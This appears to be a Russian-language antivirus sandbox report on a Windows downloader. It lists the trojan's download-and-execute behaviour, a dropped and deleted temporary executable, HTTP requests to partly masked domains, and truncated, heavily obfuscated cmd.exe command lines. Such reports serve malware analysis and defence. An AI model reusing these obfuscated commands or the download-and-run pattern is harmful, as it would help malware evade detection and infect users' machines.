Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c fo^r ; /f , ; " tokens= 2 delims=fC=GF" , %^8 , ; in , ( ; ' , aSSO^^c , ; ^^.cm^^d ' , ) , ; ^D^O , , %^8; , MX1v^/^vil^ ; ; yYKcnjhd/r " , ( (^SEt ^ ^}^-^;@=L^vGAizF41D6$C...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\319.exe
Удаляет следующие файлы
- %TEMP%\319.exe
Сетевая активность
Подключается к
- '42##ays.com':80
- 'ai###-evy.cn':80
- 'ap###iajar.com':80
TCP
Запросы HTTP GET
- http://42##ays.com/zzxcQbq/
- http://www.42##ays.com/zzxcQbq/
- http://ai###-evy.cn/n0Gjjic9U/
- http://ap###iajar.com/X9OLL3kcv/
UDP
- DNS ASK 42##ays.com
- DNS ASK ai###-evy.cn
- DNS ASK ap###iajar.com
- DNS ASK cr####ostello.com
- DNS ASK am#####santorfeto.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c fo^r ; /f , ; " tokens= 2 delims=fC=GF" , %^8 , ; in , ( ; ' , aSSO^^c , ; ^^.cm^^d ' , ) , ; ^D^O , , %^8; , MX1v^/^vil^ ; ; yYKcnjhd/r " , ( (^SEt ^ ^}^-^;@=L^vGAizF41D6$C...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c aSSO^c ^.cm^d
- '<SYSTEM32>\cmd.exe' ; , MX1v/vil ; ; yYKcnjhd/r " , ( (^SEt ^ ^}^-^;@=L^vGAizF41D6$C^s^m,3/^)a2 ^pW^wef^Xldq=n;tN\^gP^:.{bR^QkB^j-hr'9o^@^(EH0U^xOy^+^S}KcM) , )& , ; fo^r ; %D ; ^IN ; ( ^2^2 53 ^2...
